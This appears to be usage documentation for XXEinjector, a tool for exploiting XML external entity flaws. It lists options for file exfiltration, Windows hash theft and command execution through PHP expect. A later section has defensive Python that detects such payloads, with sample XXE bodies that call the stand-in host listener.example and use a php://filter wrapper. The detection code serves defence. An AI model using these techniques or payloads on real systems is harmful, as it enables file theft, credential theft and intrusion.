XXEinjector v-21/08/2015 - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.

XXEinjector automates retrieving files using direct and out-of-band methods. Directory listing only works in Java applications; for other applications the bruteforcing method must be used.
Latest change 08/21/2015:
+ Update: XXEInjector.rb

Example Output XXEInjector

Options / usage:
--host (mandatory) Our IP address for reverse connections. (--host=192.168.0.2)
--file (mandatory) File containing a valid HTTP request with XML. You can also mark the point where the DTD should be injected with "XXEINJECT". (--file=/tmp/req.txt)
--path (mandatory if enumerating directories) Path to enumerate. (--path=/etc)
--brute (mandatory if bruteforcing files) File with paths to bruteforce. (--brute=/tmp/brute.txt)

--oob Out-of-band exploitation method. FTP is the default and works in any application. HTTP can be used for bruteforcing and for enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct Use direct exploitation instead of out of band. A unique mark must be given as the value; it marks where the XXE results start and end in the response. Specify --xml to see how the XML in the request file should look. (--direct=UNIQUEMARK)
--phpfilter Use the PHP filter wrapper to base64-encode the target file before sending.
--enumports Enumerate unfiltered ports for the reverse connection. Specify the value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

--hashes Steals the Windows hash of the user that runs the application.
--expect Uses the PHP expect extension to execute an arbitrary system command. Works best with HTTP and the PHP filter. (--expect=ls)
--upload Uploads the specified file into a temp file using the Java jar scheme. (--upload=/tmp/upload.txt)
--xslt Tests for XSLT injection.

--ssl Use SSL.
--proxy Proxy to use. (--proxy=127.0.0.1:8080)
--httpport Set custom HTTP port. (--httpport=80)
--ftpport Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport Set custom port for uploading files using jar. (--jarport=1337)
--xsltport Set custom port for XSLT injection test. (--xsltport=1337)

--urlencode URL-encode the injected DTD. This is the default for URIs.
--nodtd Use this if you want to put the DTD in the request yourself. Specify --dtd to show how the DTD should look.
--timeout Timeout for receiving file/directory content. (--timeout=20)
--fast Skip asking what to enumerate. Prone to false positives.
--verbose Show verbose messages.
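Every method listed above depends on the receiving application's XML parser accepting a DOCTYPE with external entities. As an added example (not part of XXEinjector or of this post), the Python below shows a pre-parse check a receiving application can apply: it flags any DOCTYPE, any external general or parameter entity, and the URI schemes the options above rely on (file, http, ftp, gopher, jar, php, expect), and refuses to parse when anything is found. The sample request bodies, the scheme list and the listener.example host are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Schemes used by the methods above (file/ftp/http/gopher exfiltration, jar upload,
# php/expect wrappers); constructed list for this example.
SUSPICIOUS_SCHEMES = {"file", "http", "https", "ftp", "gopher", "jar", "php", "expect"}
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General (<!ENTITY n SYSTEM ..>) and parameter (<!ENTITY % n SYSTEM ..>) external entities.
ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.\-]+)\s+(?:SYSTEM|PUBLIC)\s+(?P<rest>[^>]*)>",
    re.IGNORECASE)
URI_SCHEME_RE = re.compile(rb"""["']([a-z][a-z0-9+.\-]*):""", re.IGNORECASE)

def inspect_xml_body(body: bytes) -> List[str]:
    """Return findings for an inbound XML body; an empty list means no DTD constructs seen."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype")
    for m in ENTITY_RE.finditer(body):
        kind = "parameter-entity" if m.group("param") else "general-entity"
        findings.append(f"external-{kind}:{m.group('name').decode()}")
        for scheme in URI_SCHEME_RE.findall(m.group("rest")):
            scheme = scheme.decode().lower()
            if scheme in SUSPICIOUS_SCHEMES:
                findings.append(f"scheme:{scheme}")
    return findings

def parse_untrusted(body: bytes) -> ET.Element:
    """Reject any body carrying a DTD before it reaches the parser, then parse normally."""
    findings = inspect_xml_body(body)
    if findings:
        raise ValueError("rejected XML body: " + ", ".join(findings))
    return ET.fromstring(body)

def is_rejected(body: bytes) -> bool:
    try:
        parse_untrusted(body)
        return False
    except ValueError:
        return True

# Constructed request bodies: a clean one, an out-of-band shape (parameter entity
# loading a DTD from a listener) and a direct shape using the PHP filter wrapper.
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
OOB_SAMPLE = (b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY % dtd SYSTEM '
              b'"http://listener.example/xxe.dtd">%dtd;]><data>&send;</data>')
DIRECT_SAMPLE = (b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode'
                 b'/resource=example.xml">]><r>UNIQUEMARK&xxe;UNIQUEMARK</r>')
```

Rejecting every DOCTYPE is the simplest policy; if an application legitimately needs internal DTDs, the findings list lets it allow "doctype" alone while still blocking external entities.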

Source: https://github.com/enjoiz